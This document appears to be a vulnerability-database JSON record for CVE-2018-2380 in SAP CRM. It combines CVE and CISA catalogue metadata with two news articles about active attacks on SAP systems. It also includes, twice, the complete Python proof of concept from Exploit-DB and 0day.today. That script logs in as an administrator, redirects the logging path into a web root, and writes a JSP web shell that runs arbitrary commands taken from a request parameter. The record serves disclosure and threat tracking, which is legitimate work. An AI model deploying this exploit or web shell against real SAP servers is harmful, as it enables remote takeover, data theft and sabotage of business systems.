_url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))\r\n \r\n # data variable\r\n _post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"./default_log_name.log\",\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n _post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name),\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n \r\n print(\"{0} \\n[!] Try to get RCE using log injection \".format(baner))\r\n \r\n print(\"[!] Get j_salt token for requests\")\r\n res = requests.get(_irj_portal, headers=_headers, verify=False)\r\n soup = BeautifulSoup(res.text, \"html.parser\")\r\n e = soup.find(\"input\", {\"name\": \"j_salt\"})\r\n __j_salt = e['value']\r\n \r\n print(\"[!] Login to the SAP portal\")\r\n req_adapter.post(_b2b_admin_url,\r\n headers=_headers,\r\n data={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt,\r\n \"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password),\r\n \"uidPasswordLogon\": \"Log On\"}, verify=False)\r\n \r\n print(\"[!] Change log path \")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)\r\n \r\n print(\"[!] 
Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name))\r\n req_adapter.get(_url_write_shell_to_log_file, headers=_headers)\r\n \r\n print(\"[!] Restore logs path to ./default_log_name.log\")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)\r\n \r\n print(\"[!] Enjoy!\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)\r\n parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')\r\n parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')\r\n \r\n parser.add_argument('-u', '--username', help='SAP CRM administrator')\r\n parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')\r\n \r\n parser.add_argument('-s', '--SID', help='SAP SID')\r\n parser.add_argument('-S', '--ssl', help='Use ssl connection')\r\n \r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n \r\n host = args_dict['host']\r\n port = args_dict['port']\r\n username = args_dict['username']\r\n password = args_dict['password']\r\n sid = args_dict['SID']\r\n ssl = args.ssl\r\n start(host, port, username, password, sid, ssl)\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/29994", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-12-03T16:07:25", "description": "SAP Customer Relationship Management (CRM) contains a path traversal vulnerability that allows an attacker to exploit insufficient validation of path information provided by users.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", 
"baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SAP Customer Relationship Management (CRM) Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-2380", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-03T15:19:16", "description": "SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \"traverse to parent directory\" are passed through to the file APIs.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-01T17:29:00", "type": "cve", "title": "CVE-2018-2380", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-23T16:39:00", "cpe": ["cpe:/a:sap:customer_relationship_management:7.33", "cpe:/a:sap:customer_relationship_management:7.54", "cpe:/a:sap:customer_relationship_management:7.30", "cpe:/a:sap:customer_relationship_management:7.01", "cpe:/a:sap:customer_relationship_management:7.02", "cpe:/a:sap:customer_relationship_management:7.31"], "id": "CVE-2018-2380", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2380", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:customer_relationship_management:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.33:*:*:*:*:*:*:*", "cpe:2.3:a:sap:customer_relationship_management:7.54:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2023-12-03T15:53:56", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-14T00:00:00", "type": "exploitdb", "title": "SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution", "bulletinFamily": "exploit", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-2380", "CVE-2018-2380"], "modified": "2018-03-14T00:00:00", "id": "EDB-ID:44292", "href": "https://www.exploit-db.com/exploits/44292", "sourceData": "#!/usr/bin/env python\r\nimport argparse\r\nimport urllib\r\n\r\nimport requests, random\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nhelp_desc = '''\r\nPoC of Remote Command Execution via Log injection on SAP CRM\r\n-- ERPScan\r\n\r\npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true\r\n'''\r\nbaner = '''\r\n _______ _______ _______ _______ _______ _______ _\r\n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /|\r\n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( |\r\n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | |\r\n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) |\r\n| ( | (\\ ( | ( ) || | | ( ) || | \\ |\r\n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ |\r\n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_)\r\nVahagn @vah_13 Vardanian\r\nBob @NewFranny\r\nCVE-2018-2380\r\n\r\n'''\r\n\r\n\r\ndef start(ip, port, username, password, sid, ssl):\r\n if ssl == None:\r\n base_scheme = 'http'\r\n else:\r\n base_scheme = 'https'\r\n req_adapter = requests.session()\r\n _server_ip_port = \"{0}:{1}\".format(ip, port)\r\n _username = username\r\n admin_password = password\r\n _headers = {\"User-Agent\": \"Mozilla/5.0 
(Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format(\r\n base_scheme,_server_ip_port)\r\n }\r\n\r\n # shell name\r\n _shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337))\r\n\r\n # shell_code\r\n shell_code = '''\r\n <%@ page import=\"java.util.*,java.io.*\"%>\r\n <% \r\n if (request.getParameter(\"cmd\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\r\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n } \r\n }\r\n %>\r\n '''\r\n # urls variables\r\n _irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port)\r\n _b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port)\r\n _url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port)\r\n _url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))\r\n\r\n # data variable\r\n _post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": \"./default_log_name.log\",\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n _post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\",\r\n \"selSeverity\": \"0\",\r\n \"selDest\": 
\"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name),\r\n \"selLimit\": \"10485760\",\r\n \"selCount\": \"20\",\r\n \"selFormatterType\": \"ListFormat\",\r\n \"selPattern\": \"none\",\r\n \"mode\": \"save\",\r\n \"selLocationIdx\": \"1\"}\r\n\r\n print(\"{0} \\n[!] Try to get RCE using log injection \".format(baner))\r\n\r\n print(\"[!] Get j_salt token for requests\")\r\n res = requests.get(_irj_portal, headers=_headers, verify=False)\r\n soup = BeautifulSoup(res.text, \"html.parser\")\r\n e = soup.find(\"input\", {\"name\": \"j_salt\"})\r\n __j_salt = e['value']\r\n\r\n print(\"[!] Login to the SAP portal\")\r\n req_adapter.post(_b2b_admin_url,\r\n headers=_headers,\r\n data={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt,\r\n \"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password),\r\n \"uidPasswordLogon\": \"Log On\"}, verify=False)\r\n\r\n print(\"[!] Change log path \")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)\r\n\r\n print(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name))\r\n req_adapter.get(_url_write_shell_to_log_file, headers=_headers)\r\n\r\n print(\"[!] Restore logs path to ./default_log_name.log\")\r\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)\r\n\r\n print(\"[!] 
Enjoy!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)\r\n parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')\r\n parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')\r\n\r\n parser.add_argument('-u', '--username', help='SAP CRM administrator')\r\n parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')\r\n\r\n parser.add_argument('-s', '--SID', help='SAP SID')\r\n parser.add_argument('-S', '--ssl', help='Use ssl connection')\r\n\r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n\r\n host = args_dict['host']\r\n port = args_dict['port']\r\n username = args_dict['username']\r\n password = args_dict['password']\r\n sid = args_dict['SID']\r\n ssl = args.ssl\r\n start(host, port, username, password, sid, ssl)", "sourceHref": "https://www.exploit-db.com/raw/44292", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:23", "description": "[](<https://thehackernews.com/images/-dxgYH4aIuuw/YGxlNUtGVCI/AAAAAAAACLs/oKpHnFXRhZwabJSwosFF7e-iA0QdpeyNgCLcBGAsYHQ/s0/sap.jpg>)\n\nCyber attackers are actively setting their sights on unsecured SAP applications in an attempt to steal information and sabotage critical processes, according to new research.\n\n\"Observed exploitation could lead in many cases to full control of the unsecured SAP application, bypassing common security and compliance controls, and enabling attackers to steal sensitive information, perform financial fraud or disrupt mission-critical business processes by deploying ransomware or stopping operations,\" cybersecurity firm Onapsis and SAP [said](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>) in a joint report published today.\n\nThe Boston-based company said it detected over 300 successful exploitations out of a total of 
1,500 attempts targeting previously known vulnerabilities and insecure configurations specific to SAP systems between mid-2020 and March 2021, with multiple brute-force attempts made by adversaries aimed at high-privilege SAP accounts as well as chaining together several flaws to strike SAP applications.\n\nApplications that have been targeted include, but are not limited to, enterprise resource planning (ERP), supply chain management (SCM), human capital management (HCM), product lifecycle management (PLM), customer relationship management (CRM), and others.\n\nTroublingly, the Onapsis report outlines weaponization of SAP vulnerabilities in less than 72 hours from the release of patches, with new unprotected SAP applications provisioned in cloud environments being discovered and compromised in less than 3 hours.\n\nIn one case, a day after SAP issued a patch for [CVE-2020-6287](<https://us-cert.cisa.gov/ncas/alerts/aa20-195a>) (more below) on July 14, 2020, a proof-of-concept exploit emerged in the wild, which was followed by mass scanning activity on July 16 and the release of a fully-functional public exploit on July 17, 2020.\n\nThe attack vectors were no less sophisticated. The adversaries were found to adopt a varied set of techniques, tools, and procedures to gain initial access, escalate privileges, drop web shells for arbitrary command execution, create SAP administrator users with high privileges, and even extract database credentials. 
The attacks themselves were launched with the help of TOR nodes and distributed virtual private servers (VPS).\n\n[](<https://thehackernews.com/images/-thOJEuCUSH4/YGxjK5MJGmI/AAAAAAAACLk/k5kYRCll1SYAktNePrl_GDL-cUcYgfNswCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nThe six flaws exploited by threat actors include \u2014\n\n * [**CVE-2010-5326**](<https://nvd.nist.gov/vuln/detail/CVE-2010-5326>) (CVSS score: 10) - Remote code execution flaw in SAP NetWeaver Application Server (AS) Java\n * [**CVE-2016-3976**](<https://nvd.nist.gov/vuln/detail/CVE-2016-3976>) (CVSS score: 7.5) - Directory traversal vulnerability in SAP NetWeaver AS Java\n * [**CVE-2016-9563**](<https://nvd.nist.gov/vuln/detail/CVE-2016-9563>) (CVSS score: 6.4) - XML External Entity ([XXE](<https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/>)) expansion vulnerability in BC-BMT-BPM-DSK component of SAP NetWeaver AS Java\n * [**CVE-2018-2380**](<https://nvd.nist.gov/vuln/detail/CVE-2018-2380>) (CVSS score: 6.6) - Directory traversal vulnerability in Internet Sales component in SAP CRM\n * [**CVE-2020-6207**](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>) (CVSS score: 9.8) - Missing authentication check in SAP Solution Manager\n * [**CVE-2020-6287**](<https://nvd.nist.gov/vuln/detail/CVE-2020-6287>) (CVSS score: 10) - RECON (aka Remotely Exploitable Code On NetWeaver) flaw in LM Configuration Wizard component \n\nFirst disclosed in July 2020, successful exploitation of [CVE-2020-6287](<https://thehackernews.com/2020/07/sap-netweaver-vulnerability.html>) could give an unauthenticated attacker full access to the affected SAP system, counting the \"ability to modify financial records, steal personally identifiable information (PII) from employees, customers and suppliers, corrupt data, delete or modify logs and traces and other actions that put essential business operations, cybersecurity and regulatory compliance at risk.\"\n\nOnapsis also said it was able to detect scanning activity 
for CVE-2020-6207 dating back to October 19, 2020, almost three months before the public release of a [fully-working exploit](<https://thehackernews.com/2021/01/beware-fully-functional-released-online.html>) on January 14, 2021, implying that threat actors had knowledge of the exploit prior to the public disclosure.\n\nFurthermore, a separate attack observed on December 9 was found to chain exploits for three of the flaws, namely CVE-2020-6287 for creating an admin user and logging in to the SAP system, CVE-2018-2380 for privilege escalation, and CVE-2016-3976 for access to high-privileged accounts and the database.\n\n\"This all happened within 90 minutes,\" Onapsis researchers noted.\n\nWhile no customer breaches have been uncovered, both SAP and Onapsis are urging businesses to perform a compromise assessment of applications, apply relevant patches, and address misconfigurations to prevent unauthorized access.\n\n\"The critical findings [...] describe attacks on vulnerabilities with patches and secure configuration guidelines available for months and even years,\" Onapsis CEO Mariano Nunez said. \"Unfortunately, too many organizations still operate with a major governance gap in terms of the cybersecurity and compliance of their mission-critical applications, allowing external and internal threat actors to access, exfiltrate and gain full control of their most sensitive and regulated information and processes.\"\n\n\"Companies that have not prioritized rapid mitigation for these known risks should consider their systems compromised and take immediate and appropriate action,\" Nunez added.\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) has also published an [alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) warning of ongoing nefarious cyber activity in the SAP threat landscape, stating that \"systems running outdated or misconfigured software are exposed to increased risks of malicious attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-06T13:43:00", "type": "thn", "title": "Watch Out! 
Mission Critical SAP Applications Are Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-2380", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-07T04:31:36", "id": "THN:3C21F3359B50A4527A83BD7E63B731B2", "href": "https://thehackernews.com/2021/04/watch-out-mission-critical-sap.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-07T18:10:44", "description": "Active cyberattacks on known vulnerabilities in SAP systems could lead to full control of unsecured SAP applications, researchers are warning.\n\nAdversaries are carrying out a range of attacks, according to [an alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) from SAP and security firm Onapsis issued Tuesday \u2013 including theft of sensitive data, financial fraud, disruption of mission-critical business processes and other operational disruptions, and delivery of ransomware and other malware.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSAP applications help organizations manage critical business processes \u2013 including enterprise resource planning (ERP), product lifecycle management, customer relationship management (CRM) and supply-chain management.\n\nFrom mid-2020 until today, Onapsis researchers have recorded more than 300 successful exploit attempts on unprotected SAP instances.\n\n## 
Who\u2019s at Risk?\n\nUnfortunately, the ongoing attacks could have far-reaching consequences, as SAP noted in the warning:\n\n\u201cThese are the applications that 92 percent of the Forbes Global 2000 have standardized on SAP to power their operations and fuel the global economy,\u201d the alert noted. \u201cWith more than 400,000 organizations using SAP, 77 percent of the world\u2019s transactional revenue touches an SAP system. These organizations include the vast majority of pharmaceutical, critical infrastructure and utility companies, food distributors, defense and many more.\u201d\n\nGovernment agencies should take particular notice of the spate of attacks, researchers said.\n\n\u201cSAP systems are a prominent attack vector for bad actors,\u201d Kevin Dunne, president at Pathlock, told Threatpost. \u201cMost federal agencies are running on SAP, as it has become the industry standard for government entities. However, these SAP implementations are often on-premise, and managed by the government entities themselves due to security concerns. These systems then become increasingly vulnerable when updates and patches are not applied in a timely fashion, leaving them wide open for interested hackers.\u201d\n\nThe technology sector is another hot target for attacks, according to Setu Kulkarni, vice president of strategy at WhiteHat Security.\n\n\u201cOur reporting has found that independent software vendors (ISVs) and technology companies have an inordinately high window of exposure,\u201d he told Threatpost. 
\u201cWe are seeing that ISVs and technology companies are lacking in their security rigor as they ultimately may pass on the security responsibilities to the companies that use the ISV to build products for their customers.\u201d\n\n## **Active Exploitation**\n\nThe attacks are brute-forcing high-privilege SAP user accounts, as well as exploiting a raft of known bugs: [CVE-2020-6287](<https://nvd.nist.gov/vuln/detail/CVE-2020-6287>), [CVE-2020-6207](<https://nvd.nist.gov/vuln/detail/CVE-2020-6207>), [CVE-2018-2380](<https://nvd.nist.gov/vuln/detail/CVE-2018-2380>), [CVE-2016-9563](<https://nvd.nist.gov/vuln/detail/CVE-2016-9563>), [CVE-2016-3976](<https://nvd.nist.gov/vuln/detail/CVE-2016-3976>) and [CVE-2010-5326](<https://nvd.nist.gov/vuln/detail/CVE-2010-5326>), according to the warning.\n\nThe adversaries are \u201cadvanced threat actors,\u201d according to Onapsis, as evidenced by how quickly they\u2019ve been able to develop exploits, among other things.\n\nThere is \u201cconclusive evidence that cyberattackers are actively targeting and exploiting unsecured SAP applications, through a varied set of techniques, tools and procedures and clear indications of sophisticated knowledge of mission-critical applications,\u201d the alert reads. 
\u201cThe window for defenders is significantly smaller than previously thought, with examples of SAP vulnerabilities being weaponized in less than 72 hours since the release of patches, and new unprotected SAP applications provisioned in cloud (IaaS) environments being discovered and compromised in less than three hours.\u201d\n\n\n\nSource: Onapsis.\n\nThe issues are as follows:\n\n * CVE-2020-6287 is a [critical authentication bypass issue](<https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/>) in SAP NetWeaver Application Server Java allowing full account takeover;\n * CVE-2020-6207 is another critical authentication bypass bug, in SAP Solution Manager;\n * CVE-2018-2380 is a medium-severity flaw in SAP CRM, which allows an attacker to exploit insufficient validation of path information provided by users;\n * CVE-2016-9563 is also a medium-severity bug, this time in SAP NetWeaver AS Java. Remote authenticated users can exploit it to conduct XML External Entity (XXE) attacks, which allow them to interfere with XML processing;\n * CVE-2016-3976 is a high-severity directory traversal vulnerability in SAP NetWeaver AS Java that allows remote attackers to read arbitrary files;\n * And CVE-2010-5326 is an 11-year-old critical issue in the Invoker Servlet on SAP NetWeaver AS Java. It doesn\u2019t require authentication, which allows remote attackers to execute arbitrary code via an HTTP or HTTPS request.\n\n\n\nExploit uses \u2013 click to enlarge. 
Source: Onapsis.\n\nAfter initial access, Onapsis observed threat actors using the vulnerabilities to establish persistence, for privilege escalation, evasion and, ultimately, complete control of SAP systems, including financial, human capital management and supply-chain applications.\n\n\u201cAdditionally, attempts at chaining vulnerabilities to achieve privilege escalation for OS-level access were observed, expanding potential impact beyond SAP systems and applications,\u201d according to the analysis.\n\nAs an example, Onapsis said that one actor was able to scan and create an admin user utilizing an exploit utility for CVE-2020-6287. Upon successfully creating the profile and logging in, additional exploits were executed against CVE-2018-2380 for shell upload, as the attackers tried to access the operating system layer. Following that, exploits for CVE-2016-3976 were executed, targeting the download of a \u201ccredential store,\u201d which provides access to logins for high-privileged accounts and the core database. Worryingly, this all happened within 90 minutes, according to Onapsis.\n\n\n\nExploit chaining. Source: Onapsis.\n\nInterestingly, the cyberattackers in some cases are patching the exploited vulnerabilities after they\u2019ve gained access to a victim\u2019s environment, Onapsis said.\n\n\u201cThis action illustrates the threat actors\u2019 advanced domain knowledge of SAP applications, access to the manufacturer\u2019s patches and their ability to reconfigure these systems,\u201d according to the firm. 
\u201cThis technique is often used by threat actors to deploy backdoors on seemingly patched systems to maintain persistence or to evade detection.\u201d\n\n## **Who\u2019s Behind the SAP Attacks?**\n\nThe activity is being mounted by multiple groups, who appear to be engaged in coordinated activity across vast swathes of infrastructure, according to the alert.\n\n\u201cAttackers [are] triggering exploitation from different source systems from the ones used to perform subsequent manual logins were detected, indicating the possibility of coordinated groups and/or actors leveraging wide-spread attack infrastructure,\u201d it reads. \u201cWhile this behavior is common when analyzing operating system and network-based attacks, this data provides evidence that the same approach is also used when targeting mission-critical applications, as these actors use TOR nodes and distributed VPS infrastructures to launch the attacks and escalate privileges.\u201d\n\nThe activity is originating from all over the world, including Hong Kong, India, Japan, the Netherlands, Singapore, South Korea, Sweden, Taiwan, United States, Vietnam and Yemen.\n\n## **How Can I Prevent an Attack?**\n\nThe main way to thwart these kinds of attacks is to patch the vulnerabilities. Also, any web-facing accounts should have unique passwords to disallow automated brute-force attempts to break in; and any systems that don\u2019t need to face the public web should be taken offline.\n\n\u201cAll observed exploited critical weaknesses have been promptly patched by SAP, and have been available to customers for months and years in some cases,\u201d the alert noted. 
\u201cUnfortunately, both SAP and Onapsis continue to observe many organizations that have still not applied the proper mitigations\u2026allowing unprotected SAP systems to continue to operate and, in many cases, remain visible to attackers via the internet.\u201d\n\nAlso, while applying security patches in a timely fashion is critical to closing down the risk from major, known vulnerabilities, Pathlock\u2019s Dunne pointed out that patching can only remedy issues that are in the rear-view. With cyberattackers patching the bugs behind them, there also needs to be a way to detect malicious activity.\n\n\u201cFor a comprehensive, forward looking approach to SAP security, organizations need to implement a comprehensive solution to monitor user activities within the system, including interactions with sensitive data,\u201d he told Threatpost. \u201cThis way, even attackers that are able to breach SAP systems by known or unknown vulnerabilities can still be identified and their damage can be mitigated in real-time.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. 
